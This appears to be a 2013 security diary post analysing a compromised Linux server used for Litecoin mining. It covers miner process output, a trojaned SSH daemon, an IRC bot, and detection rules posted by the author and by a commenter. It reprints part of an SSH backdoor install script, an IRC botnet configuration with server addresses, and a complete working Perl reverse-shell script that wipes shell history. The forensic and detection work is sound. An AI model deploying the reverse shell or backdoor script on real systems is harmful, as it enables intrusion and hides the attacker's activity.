The case of Minerd

Published: 2013-12-16. Last Updated: 2013-12-16 03:40:49 UTC
by Tom Webb (Version: 2)
6 comment(s)

 

I recently ran across an interesting compromised system. While the initial vulnerability compromised was nothing special, compromised credentials, what the system was being used for and one of his persistence technique was a lot less common than I normally see.  The system had 3 different backdoors and was used for mining virtual currency.

 

When responding to the system, I quickly noticed that an unknown process was running.  Additionally, I saw that the running process was deleted and an additional file with the process had also been deleted(See Below).  This is a common technique for attackers on Linux systems, while the file is marked deleted on the file system, the process keeps it open until its stopped.

 

Minerd

--------------

PS Results

1 S www-data 13335     1 99  80   0 - 13941 -      Nov10 ?        12-01:46:12 ./minerd -o stratum+tcp://mine.pool-x.eu:9000 -u <user> -p <pw>--algo scrypt --no-longpoll -B

 

LSOF Results

minerd    13335   www-data  txt       REG        8,1   379680     385036 /tmp/minerd (deleted)

minerd    13335   www-data    4u     IPv4   14473113                 TCP d.local:41591->mine.pool-x.eu:9000 (ESTABLISHED)

--------------

 

Minerd is used for Litecoin mining, think cheaper version of bitcoin and primed for CPU harvesting of coins. As virtual currency values continues to increases, I’m expecting to see a lot more of these types of attacks on servers. Mining will be better financially than using the system for spamming or a basic bot.

 

The specific mining protocol for this software is (Stratum Mining Protocol) A Sample of the traffic to the mining pool (178.33.111.19).

--------------

{"params": ["ee9", "f2d2b32c8c45a965c0459d7ce169b9cbb71d741d2a77574577f6658dfa677

e0a", "01000000010000000000000000000000000000000000000000000000000000000000000000

ffffffff2103830207062f503253482f0410bf835208", "072f506f6f6c582f0000000001e08e472

a010000001976a9146effd3bfcee317f978ea0927efd99f5d7992dacd88ac00000000", ["28eab10

f99561dbabf1555ea7f36358e4752a7dc1a69ad980e50156e89e00320", "963c9c57be6a0b60f421

861cbfc8ca6aa75e5ca0ad43b9276a46a871223d381a", "ad83aa11bab14d23472518b9c0d5bc59a

b869b45f022a8e176a50c58af70abb4"], "00000002", "1b340532", "5283bf10", false], "i

d": null, "method": "mining.notify"}

--------------

 

I was able to find a writeup on the protocol @minind(dot)bitcoin(dot)cz/stratum-mining.

 

I did not find a snort rule for this kind of traffic. The rule below is looking at any port, as I was not able to verify the incoming port should be 9000. It seems to depend on the mining pool the attacker is using.  

 

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Possible Bitcoin/LiteCoin Mining"; flow:established; content:"|7B 22 70 61 72 61 6D 73 22 3A 20 5B 22|"; Depth:15; classtype:bad-unknown; reference:url,mining.bitcoin.cz/stratum-mining; sid:1000500; rev:1;)


 

SSHD Trojaned

The attacker had time stomped all the files in the /usr/sbin directory to hide file modifications. We found some interesting strings in the SSH daemon to quickly discover the backdoor (See Below). Trojaned files have been around for a long time, but I do not often run into them on compromised Linux servers.  In this case, the attacker was not very stealthy about modifications to the file.

--------------

Partial Strings from the back door

[1m |Enjoy this private backdoor!  |  

[2;31m

[1m  <----|====O)))==)\) /====     

[36m

[1m |We won't do any harm to you;) |   

220f5212624556ad12718ecb1c5cdda2

--------------

 

The initial script for making the backdoor was not recovered on the servers. After doing some quick Googling, I came across this install script for a ssh backdoor (pastebin.com/CDe7epGA). Other parts of the toolkit seemed to matchup. This my not be the identical script, but it was close to what was used.

 

--------------

BPASS=`./tools/random.sh 12`

echo -e "${BLUE}# Backdoor Password set to : ${WHITE}${BPASS}${NORMAL}"

cat backdoor.h|sed -e s/SSHD_PASS/"$BPASS"/ -e s#LOG_PATH#"$LPATH"# > 1.temp

mv 1.temp backdoor.h

./configure --sysconfdir=/etc/ssh 2> error_log.1

 

./logcleaner -u root

echo -e "${CYAN}# ENJOY THIS PRIVATE BACKDOOR ${NORMAL}"

--------------


 

IRC BOT

The second backdoor that was used is a typical IRCbot. Nothing special here, the install directory was /var/lib/.phpdata/sshd. The attacker named the script sshd to try and provide more stealth for the system. The IRC Channel name was #MuieBa.

 

 

 

Perl Backdoor

 

This is a typical perl reverse shell, give the script the IP and port you want to “Shovel a shell” to. It was located in the /tmp folder and was never used by the attacker. The scripts stops the bash_history file from being saved and echos output when it connects to the destination.  Its MD5 is 48d4d5a3dee9ef43e5b1387356d2f7ff and filename back.txt.

 

--------------

 

cat back.txt

#!/usr/bin/perl

use IO::Socket;

$system    = '/bin/bash';

$ARGC=@ARGV;

print "--== ==-- \n\n";

if ($ARGC!=2) {

  print "Usage: $0 [Host] [Port] \n\n";

  die "Ex: $0 127.0.0.1 2121 \n";

}

use Socket;

use FileHandle;

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";

connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";

print "[*] Spawning Shell \n";

SOCKET->autoflush();

open(STDIN, ">&SOCKET");

open(STDOUT,">&SOCKET");

open(STDERR,">&SOCKET");

print "--== Thuraya Team ==--  \n\n";

system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo;

echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");

system($system);



Are you seeing compromised servers being used for Mining currency?Let us know!

 

Tom Webb

6 comment(s)

Comments

I've been seeing this rise in the past few months, mostly these are exploiting the re-emergence of CVE-2012-1823, mostly they use this to spawn the usual perl IRC bots, but I've also seen ColdFusion vulnerabilities leveraged on windows boxes to get bitcoin miners on there too.
I've mainly had them sign up for VPS services. I wondered why but I figured out by looking at the Litecoin hardware page - E5-2620 CPUs do the best which may explain Thai, Vietnamese and Filipinos signing up for 10 - 40 services at a time.
I did these three at the weekend which I have submitted to emergingthreats. They will go through QA and will hopefully be ok for going into the ET rule update.

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message"; flow:established,to_server; content:"{|22|id|22|"; depth:10; content:"|22|method|22 3A| |22|mining."; within:100; content:"|22|params|22|"; within:50; pcre:"/\x22mining\x2E(subscribe|authorize)\x22/"; classtype:trojan-activity; reference:url,research.zscaler.com/2013/12/bitcoin-mining-operation-seen-across.html; reference:url,www.btcguild.com/new_protocol.php; reference:url,mining.bitcoin.cz/stratum-mining; sid:123997; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET TROJAN W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Initial Connection Server Response"; flow:established,to_client; content:"|22|result|22 3A| [[|22|mining.notify|22|"; depth:120; classtype:trojan-activity; reference:url,research.zscaler.com/2013/12/bitcoin-mining-operation-seen-across.html; reference:url,www.btcguild.com/new_protocol.php; reference:url,mining.bitcoin.cz/stratum-mining; sid:124009; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET TROJAN W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Work Server Response"; flow:established,to_client; content:"|22|params|22 3A| [|22|"; depth:120; content:"|22|method|22 3A| |22|mining.notify|22|"; distance:0; classtype:trojan-activity; reference:url,research.zscaler.com/2013/12/bitcoin-mining-operation-seen-across.html; reference:url,www.btcguild.com/new_protocol.php; reference:url,mining.bitcoin.cz/stratum-mining; sid:124010; rev:1;)
Is this article from the past? I saw minerd nearly a year ago!
I found this ...

b0tnet

NICK root
USERFILE 1
CMDCHAR -
LOGIN root
IRCNAME ^C2root^C
MODES +ix-ws
TOG CC 1
TOG CLOAK 1
TOG SPY 1
SET OPMODES 4
SET BANMODES 6
SET AAWAY 0
TOG NOIDLE 1

CHANNEL #fuckspot
TOG PUB 1
TOG MASS 1
TOG SHIT 1
TOG PROT 1
TOG ENFM 1
SET ENFM +nts
SET MDL 4
SET MKL 4
SET MBL 4
SET MPL 1

SERVER 93.174.94.158 6667
SERVER 210.205.6.30 6667
SERVER 209.20.66.191 6667
SERVER 208.98.59.236 6667
SERVER 89.248.172.144 6667
SERVER 208.98.59.236 6667
SERVER 186.2.165.72 6667
SERVER 115.47.22.196 6667
The current PHP worm stuff seems to be virtual currency related.

http://sempersecurus.blogspot.co.uk/2013/12/a-forensic-overview-of-linux-perlbot.html

Diary Archives